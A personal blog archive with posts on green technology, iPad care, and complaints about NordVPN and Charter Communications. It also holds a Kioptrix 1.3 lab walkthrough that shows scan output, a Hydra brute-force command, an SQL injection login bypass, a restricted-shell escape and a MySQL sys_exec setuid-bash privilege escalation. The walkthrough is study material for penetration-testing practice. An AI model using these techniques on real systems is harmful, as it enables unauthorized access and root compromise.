Technology Can Save the World!

For a lot of people, we’re living in pretty scary times. Climate change is the sort of thing that seems so huge that it often feels as though there’s pretty much nothing that we can do about it. For some, the solution is just to avoid thinking about it, something that is certainly not going to do anyone any good! But that doesn’t mean that you should just be constantly worrying about it either. In fact, there are some things that are making a real difference to our impact on the environment, and many of those things are coming from the world of technology. There has been a major push over the last few years toward tech that can help work against the damage that has been done to the planet. So, in the spirit of helping people feel a little bit more positive about the world we live in, here are some amazing ways that technology is saving the world.

Solar power

It’s truly amazing that such an incredible, renewable source of power and energy has been right under our noses for so long. Of course, the problem for the longest time has been how to actually harness that power in a useful and productive way. Over the last couple of decades, there have been some incredible advances in solar technology, but there are some that are just around the corner that just might revolutionize it all over again. Things like solar windows have shown that it’s possible to integrate solar cells into all manner of items. Check out this article on powertechnology.com to find out more about the incredible things that solar windows can do. Within the next couple of decades, solar cells could be incorporated into pretty much anything: homes, clothes; you name it!

Electric vehicles

Let’s face it, the burning of fossil fuels is the major source of humanities major impact on climate change. Of course, a great deal of that impact is down to large companies, factories, and industries, but that doesn’t mean there isn’t also an impact on a more personal level. The vehicles that we drive have undoubtedly had an impact on the environment. The issue is that we simply need our vehicles to get around. That’s where companies like theelectricrider.com come in. By producing affordable electric vehicles, companies like this are making clean, energy efficient transport available to far more people than ever before.

Nuclear energy

A lot of people tend to feel very odd at even the slightest mention of nuclear energy. The image of radioactive disasters and massive levels of destruction end up coloring people’s opinions despite the fact that it has the potential to be an incredibly clean, renewable resource. There are now new types of reactors that are designed to turn nuclear waste into power. We’re not quite at the level of nuclear fusion yet, but many of these fission reactors are far safer and more viable than anyone could have ever predicted. Many of these reactors aim to put the fears and concerns that many people have about nuclear energy to bed permanently.

The iPad Health Dump

The Ipad has literally changed the way of entertainment over the last few years. First, it received some criticism. Some saying it was just a big phone without the phone, and that there are various security issues with it. However, it has stood the test of time and it has become a grade a companion for millions of people across the world. The Ipad is used expertly by many, but there are still some areas of concern for some. So, here are some hints and tips that can not only help you get the best out of your Ipad, but to keep it safe too.

Use A Case

So many people don’t use cases or screen protectors. Their size makes them more vulnerable to a drop than a phone. Make sure you protect it. Get a solid back case that wraps around when not in use. You can use a screen protector too if you wish to keep the screen free from scratches and abrasions. You can find some cool cases at ithingum.com. Depending on what you use it for dictates the case needed. For example if you work on a construction site get something solid and hard, but if you use it around the house something softer is fine. Don’t ruin your Ipad by a silly drop. Mistakes are made, so try to protect it as much as you can.

Virus Protection

Staying with protection, you also need to protect it from external threats. Many people think their phones and tablets aren’t at risk from viruses, but they are essentially computers and as a result can become affected just the same. You open a dodgy email attachment that has been designed to attack IOS then you could be in trouble. They have built in security, but you would be better off using software to protect it from attack. You could lose all kinds of photos, messages, and other memories if you haven’t backed it up in some time. Here are some of the better security apps you can make the most of.

Don’t Leave It In Direct Sunlight

You may have seen the message that comes up. Warning that the system cannot work because it is too hot. This is a great addition by Apple that can stop it breaking, but remember, it still gets damaged. Doing this can sizzle the internal components. You may not notice anything right away, but over time it make become sluggish and not charge properly. Don’t leave it in direct sunlight because it will be damaged, if you have to keep it face down and ensure it is under a cover for enhanced shade.

Charge It Right

Try to ensure you charge the device right so that it doesn’t lose charge over time. The newer products are better but if you have an older one and you don’t charge properly you could end up losing huge chunks of it. This is why sometimes it jumps from certain numbers down to one or two, simply because the device is confused. You can find the correct charging methods from Apple themselves.

Kioptrix Level 1.3 (VM #4) Walkthrough

In my efforts to self-study in preparation for the OSCP certification later this year, I’ve been going through some of the intentionally vulnerable Virtual Machines (VMs) on vulnhub.com to sharpen and broaden my penetration testing and hacking skills. Among others I’ve completed, the Kioptrix series of VMs is allegedly similar to what you see in the actual OSCP test, so I’ve been going through them in order.

Part of completing the OSCP is providing a write-up of your hacking adventures to explain how and what you did to hack a server, so I figured I better start now. Other folks do similar write-ups on the VMs on vulnub.com, and I’ll see if they will add this to Kioptrix 1.3 page soon.

Hopefully, someone will find this useful either way.

It should be noted that this VM was known to have at least two possible paths to getting root on the system, and this writeup outline just one.

Discovery

On my local network, this VM turned up with the IP address of 192.168.0.110.

nmap

Running an nmap scan revealed some open ports and running services:

root@kali:~# nmap -v -sS -A -T4
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
| 1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|_ 2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-methods: 
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)

Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33

Poking Around

Checking things out by hand based on the nmap scan results, I found there was a login page running on port 80 at http://192.168.0.110

No basic SQL injection working from any initial attempts.

Nothing in the source code of note. Some other basic manual fuzzing and poking around didn’t reveal much either.

Nikto

Nikto turned up some basic stuff about Apache that I thought might be worth looking into later:

Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
+ PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 5.6.9). PHP 5.5.25 and 5.4.41 are also current.
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.

dirb and dirsearch

A basic dirb scan turned up a directory:
http://192.168.0.110/john/

I though that could be a username. Running dirb with a bigger wordlist (big.txt in Kali) turned up another one:
http://192.168.0.110/robert/

Both of those directories contained a file (robert.php and john.php) that, when clicked, would just redirect you back to the main login page.

I also ran DIRSEARCH, a python tool that also works well for finding directories and files.
found file: database.sql

(Note: Dirsearch is not included in Kali by default. Requires you to setup Python 3 in a virtual environment to run it.)

enum4linux

Since ports 139 and 445 were being used, I went on try enum4linux

root@kali:~# enum4linux -a 192.168.0.110
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Feb 9 00:40:35 2017

<em>(Pasting only the relevant stuff here.)</em>
 ===================================================== 
| Enumerating Workgroup/Domain on 192.168.0.110 |
 ===================================================== 
[+] Got domain/workgroup name: WORKGROUP

============================================= 
| Nbtstat Information for 192.168.0.110 |
 ============================================= 
Looking up status of 192.168.0.110
 KIOPTRIX4 &lt;00&gt; - B &lt;ACTIVE&gt; Workstation Service
 KIOPTRIX4 &lt;03&gt; - B &lt;ACTIVE&gt; Messenger Service
 KIOPTRIX4 &lt;20&gt; - B &lt;ACTIVE&gt; File Server Service
 ..__MSBROWSE__. &lt;01&gt; - &lt;GROUP&gt; B &lt;ACTIVE&gt; Master Browser
 WORKGROUP &lt;1d&gt; - B &lt;ACTIVE&gt; Master Browser
 WORKGROUP &lt;1e&gt; - &lt;GROUP&gt; B &lt;ACTIVE&gt; Browser Service Elections
 WORKGROUP &lt;00&gt; - &lt;GROUP&gt; B &lt;ACTIVE&gt; Domain/Workgroup Name

MAC Address = 00-00-00-00-00-00

============================== 
| Users on 192.168.0.110 |
 ============================== 
index: 0x1 RID: 0x1f5 acb: 0x00000010 Account: nobody Name: nobody Desc: (null)
index: 0x2 RID: 0xbbc acb: 0x00000010 Account: robert Name: ,,, Desc: (null)
index: 0x3 RID: 0x3e8 acb: 0x00000010 Account: root Name: root Desc: (null)
index: 0x4 RID: 0xbba acb: 0x00000010 Account: john Name: ,,, Desc: (null)
index: 0x5 RID: 0xbb8 acb: 0x00000010 Account: loneferret Name: loneferret,,, Desc: (null)

user:[nobody] rid:[0x1f5]
user:[robert] rid:[0xbbc]
user:[root] rid:[0x3e8]
user:[john] rid:[0xbba]
user:[loneferret] rid:[0xbb8]

========================================== 
| Share Enumeration on 192.168.0.110 |
 ========================================== 
WARNING: The "syslog" option is deprecated
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]

Sharename Type Comment
 --------- ---- -------
 print$ Disk Printer Drivers
 IPC$ IPC IPC Service (Kioptrix4 server (Samba, Ubuntu))

Server Comment
 --------- -------
 KIOPTRIX4 Kioptrix4 server (Samba, Ubuntu)

Workgroup Master
 --------- -------
 WORKGROUP KIOPTRIX4

[+] Attempting to map shares on 192.168.0.110
//192.168.0.110/print$ Mapping: DENIED, Listing: N/A
//192.168.0.110/IPC$ [E] Can't understand response:
WARNING: The "syslog" option is deprecated
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]
NT_STATUS_NETWORK_ACCESS_DENIED listing \*

===================================================== 
| Password Policy Information for 192.168.0.110 |
 ===================================================== 
[E] Unexpected error from polenum:
Traceback (most recent call last):
 File "/usr/bin/polenum", line 33, in &lt;module&gt;
 from impacket.dcerpc import dcerpc_v4, dcerpc, transport, samr
ImportError: cannot import name dcerpc_v4
[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 0

S-1-22-1-1000 Unix User\loneferret (Local User)
S-1-22-1-1001 Unix User\john (Local User)
S-1-22-1-1002 Unix User\robert (Local User)

enum4linux complete on Thu Feb 9 00:40:51 2017

acccheck

I ran acccheck on the ‘robert’ user with the big.txt pw list, to no avail. Can circle back to try the other usernames if needed.

THC Hydra

You can use Hydra to brute force FTP, SSH, POP3, and SMTP account. Let’s try Hydra with those usernames to find SSH accounts! Trying the usernames found via acccheck with SSH logins:

robert
root
loneferret
john

hydra -L users -P 10_million_password_list_top_100000.txt -t 4 192.168.0.110 ssh -vv

Nothing turned up! Bummer.

database.sql

This was found during discover with dirsearch, and it appears to be a short MySQL dump file. Since other avenues were turning out to be fruitless, I thought I’d give this a closer look.

Immediately, the first thing to note is that there’s a username and password shown in the dump file.

john
1234

Let’s try it on the HTML login form at http://192.168.0.110/index.php?. No luck!
I thought maybe that was a default password, so I tested it on the other known users as well (robert, root, loneferret), but still no luck.

Perhaps it’d work with SSH or SMB?
Negatory

The file at least led me to believe MySQL was in place, so perhaps some more SQLi exploration would help.

After a number of failed attempts and errors by trying various SQL injection strings, using this worked:

Username: john
Password: ' OR 1=1 #

That took me to the User Admin Panel and showed the actual password.

That seemed kinda easy. But this is when things got hard, actually.

I logged out and confirmed that the password worked. It logged me back into that same page. But what good is that? Let’s try SSH again!

Shell obtained. However, the shell seemed to be extremely limited. As instructed at login, typing ? or ‘help’ gets you a list of allowed commands:

I was warned about trying to cd into the root directory, and getting kicked out if I tried again.

lpath is the same as pwd.

The only available command that looks somewhat useful is echo. Let’s see if we can echo the contents of .profile


Uh oh. It really did kick me out! Luckily, all I had to do was reconnect via SSH. Let’s try a different file:

Bummer. How about getting around now that we know it is possible to simply re-log via SSH if you get kicked out? No luck.

Must break out of the restricted “LigGoat” shell. To the Google!

Searching for “escape restricted shell echo” I found a handy article:
https://pen-testing.sans.org/blog/2012/06/06/escaping-restricted-linux-shells

Trying a number of things, I finally found the right trick, which is to use Python to switch shells:

echo os.system("/bin/bash")

That was weird, but it worked, and I got a less restricted shell. This website was of much help to find the specific command needed: http://netsec.ws/?p=337

Finally, a useful shell. Well, more useful. It still seems to be a basic user account with no real privileges. So where to next? MySQL exists and can be leveraged to take over a box under the right circumstances, so before exploring other vectors, I decided to start with it.

MySQL

Revisiting the web directory and the application running on the website, I found a handy SQL statement in checklogin.php. This statement had the mysql connection string, including the username and password, which were simply:

user: root
pass: (empty)

That suggested the root password was never changed when MySQL was installed, so this was probably a default installation with few tweaks or security enhancements. Sure enough, I was able to log in:

Things got off track for a while here, as I wasn’t really sure what to do from this point. However, this Google search helped me:

mysql root pwn server

That led me to a Facebook post, of all things:

https://www.facebook.com/notes/security-training-share/mysql-root-to-system-root-with-lib_mysqludf_sys-for-windows-and-linux/865458806817957/

It described the situation perfectly:

“We may have MySQL root access but not system root access for a number of reasons including having a shell account on the target whilst MySQL’s root user has been left unpassworded by default, or alternatively gaining access via SQL injection through a web application connecting to the database as root, which is something I see far too often.”

The necessary lib file was already at /usr/lib/lib_mysqludf_sys.so which meant I didn’t need to grab it from sqlmap and upload it to the system.

Modifying those instructions a little, there was no need to compile a c script (which I was unable to do as user ‘john’ anyway.

Where that article has this line:

select sys_exec('id &gt; /tmp/out; chown npn.npn /tmp/out');

Just do this instead:
select sys_exec('chmod u+s /bin/bash');

Then drop out of MySQL and run this:
bash -p

It should drop you into a root shell!
cd /root

cat congrats.txt
It described the situation perfectly:
"We may have MySQL root access but not system root access for a number of reasons including having a shell account on the target whilst MySQL’s root user has been left unpassworded by default, or alternatively gaining access via SQL injection through a web application connecting to the database as root, which is something I see far too often."

The necessary lib file was already at /usr/lib/lib_mysqludf_sys.so which meant I didn't need to grab it from sqlmap and upload it to the system.

Modifying those instructions a little, there was no need to compile a c script that changes users.

Instead of this line:
select sys_exec('id &gt; /tmp/out; chown npn.npn /tmp/out');

Just do this:
select sys_exec('chmod u+s /bin/bash');

Then drop out of MySQL and run this:

  Ø bash -p

It should drop you into a root shell!

cd /root

cat congrats.txt

Root obtained. Mission complete!

 

NordVPN’s Bait and Switch

The old bait and switch: promise you one thing and sell you another. That’s what happened when I signed up for a year of VPN service through NordVPN. Their website said:

Easiest VPN Ever. To get on NordVPN, just click and go. NordVPN’s secure VPN software takes care of all the hard stuff so you can focus on fun stuff. And work stuff, if you have to.”

Their imagery showed multiple devices running their software, including phones and laptops.

I had read about their service and took the plunge. After I had paid, I found out they do not have an app for Mac OS X or Android. Those apps are supposedly coming soon, but not yet. For now, you have to download a third-party app for each device, download a bunch of configuration files, install said configuration files, configure a bunch of things, remember your username and password for each configuration file, and then figure out what is going on and whether or not you are actually connected.

To be fair, they do have instructions on how to do all of this, but it is far from “Easiest VPN Ever.” Every other VPN app I have used is a simple app you download and click a button to get going with.

I chatted with NordVPN’s technical support guy, “Dave,” who informed me that of their refund policy, which states that unless their product did not work for a fault of their own, I could not get a refund for my money. All he could do was extend my subscription by 3 months.

(01:30:40) David: if the service does not work we will issue a refund.
(01:31:17) Visitor 34392357: that is my point – it doesn’t work as you advertise it. it only works through a lengthy process of installing other software.

I would argue that their product does not work as advertised and I am entitled to a refund. In fact, it’s not even their product I am using — I am using something called “Tunnelblick” on my Mac, and an app called OpenVPN on my Android phone to connect to the NordVPN servers.

In summary, the bait was the promise of an easy to use VPN app. The switch was not even having an app for me to use.

Are You Putting Your WordPress Site at Risk?

WordPress as a platform has been a solid, secure application over the years. The few times a vulnerability has been found, the WP team has been super-fast to patch it, publicize it, and take care of business.

That said, there are two major areas where WordPress lacks in security:

1. Plugins

2. Administrators

There are so many plugins for WordPress, which is part of what makes it so great. However, those plugins can also present attack vectors, and we see evidence of this almost every day.

It was just revealed that most WP users have very little understanding of the risk they are lending to their own websites. Not updating plugins, not updating WP itself, and not doing backups, are the most easily fixed things that people tend to not do.

This puts WP websites at risk, lets them get hacked, and gives WordPress as a whole a bad wrap.

The survey of 503 WordPress users, which took place online during February this year, revealed that WordPress users are more exposed to security problems than expected. In total, 54 percent of respondents said they updated WordPress between once a week and every few weeks, and yet only 24 percent back their websites up — and only 23 percent have received training in the use of tools such as backup plugins.

ZDNet

On that note, I thought I’d mention that the most popular SEO plugin for WordPress, Yoast’s WP SEO, has a new, major vulnerability in it. GO UPDATE!

Charter Communications Nightmare

Big fat meanie heads.

I’m not sure anyone will want to read this entire post, but I wanted to share it and document it in case anyone else finds themselves in the same boat.

Charter Communications is a bad, bad company. Charter Communications has terrible customer service. Here is my story.

We bought and moved into a new house in July. We called to have Charter set up a couple of days before we moved in, and their Residential department said they did not service our address because the line was over 1000 feet away. However, there was a Charter box at the end of our driveway, roughly 35 feet from the house, and the people who sold us the house guaranteed that Charter was available. Our new neighbors have Charter Business being served from that box, so Charter was clearly available.

I called Charter Business, and they said they could definitely service us from that box. It’d be a little more money each month, but we knew we needed it, so we jumped in. We were assigned a friendly Business representative who was very helpful in getting us all set up. At this time, we were told we could cancel and get a refund within 30 days.

A couple of weeks into the Business service, I called Residential back, just to see if they could switch us over since we were unhappy with our Business account, and since we clearly had Charter access at our house now. With Business, we were paying more for fewer features, such as a poorer channel lineup, no music channels, and no On Demand. They said they could definitely help us, however, we’d need to have Business cancelled separately since they were “two separate things” in Charter. They said that there was nothing they could do to make a seamless switch, and that they’d have to treat this as a new service being set up.

They sent a Charter Residential technician to come out and set up our new Residential service. He said he had to replace all of our HD boxes and our modem with new ones since this was considered a new setup. I thought that was silly, but he swapped out all the hardware, got us set up, took the old hardware with him, and went on his way.

The next day, I called Business, as instructed by Residential, and asked them to cancel our service. They obliged. Unfortunately, they also sent a guy out who promptly disconnected our service altogether. Apparently, he didn’t know we had switched over to Residential service.

We had to call and schedule an appointment for reconnection. You know how appointments go: they give you a 4 hour window in which you must come home from work early for, only for them to arrive late. It turned out we didn’t even need to be there for the reconnection to occur, but they didn’t tell us that ahead of time. A pain, but they got us reconnected. We went about our lives, thinking this was all over.

Then we got the bill from Charter Business in the mail. They wanted us to pay for the first month of service and three missing HD boxes: the boxes that the Residential technician took with him when he switched over. The bill was about $650.

Here we were with none of the hardware they said we had, thinking we’d actually be getting a refund since we cancelled within 30 days. Instead we got a $650 bill!

I promptly called the Business billing folks to clear up the situation. They filed a lost equipment report of some kind regarding the HD boxes and said they’d let me know the results the next day. Then, they told me that because this was not a “change of service” or a “switch” that we didn’t qualify for the 30 day refund. I told them that when I called to switch from Business to Residential, I was told I couldn’t do a switch, that it had to be two separate transactions. The customer service rep said it didn’t matter. I got off the phone, exasperated.

The next day, they didn’t call me about the missing equipment report as promised. I called them back to find out the status, but there was no record of it on my account, apparently. So they filed another one.

I also asked about the refund again. This time, I got a whole different story. Wait until you hear this. The Billing customer service lady told me that because I didn’t mention the 30 day refund when I cancelled service, I didn’t qualify for it. I asked her how I was supposed to know I had to mention it, and she said I should have known based on commercials or advertisements. That seemed absolutely insane to me. After asking to talk to a manager, which she wouldn’t let me do, she told me I’d need to talk to my original Business sales rep about it since he was the only one who could reverse the charges or do anything about it.

So, I emailed him back and explained the situation. He said that he couldn’t do a thing, and that I’d have to call Billing. I told him that they sent me to him, but he never emailed me back.

At this point, I filed a complaint with the FCC.

Then, I started getting calls from a strange number at all hours of the day. I finally answered and it was an “equipment recovery” company (aka collections agency) attempting to find the missing HD boxes. They were persistent, even thought I told them what happened. Finally, they made a note of it on my account and let me go. I still got a letter from them saying the same thing: that my HD boxes needed to be turned in or I’d owe $125 each.

Charter CEO Thomas Rutledge makes over $2 million a year. I don’t.

I haven’t heard from Charter since the FCC complaint, but I did hear from the collections company again. This time it was about the cable modem from the business account. I told them that the Charter technician took it with him. They guy said he’d make a note of it.

So that is where I am after almost 2 months of this rigmarole. I have yet to see a credit to my account from Charter Business. It would be about $239 I could really don’t think I need to pay since I cancelled within the 30 day trial period. They have since sent me another bill asking me to pay up.

I’ll update this post as I learn more. Maybe Thomas Rutledge, the Charter CEO, will see this and realize how screwed up his company is. One can hope, anyway.

Update 9/28/14Here are the terms of the Charter Business 30 Day Guarantee. I certainly don’t see anything in there that suggests I don’t qualify for it.

Update January, 2015: I received a phone call from a Charter Business representative not long after this blog post came out. He assured me that he would have an account specialist look into the situation and that I’d soon hear back from him on the status. I never heard anything. I also never got another bill from Charter Business!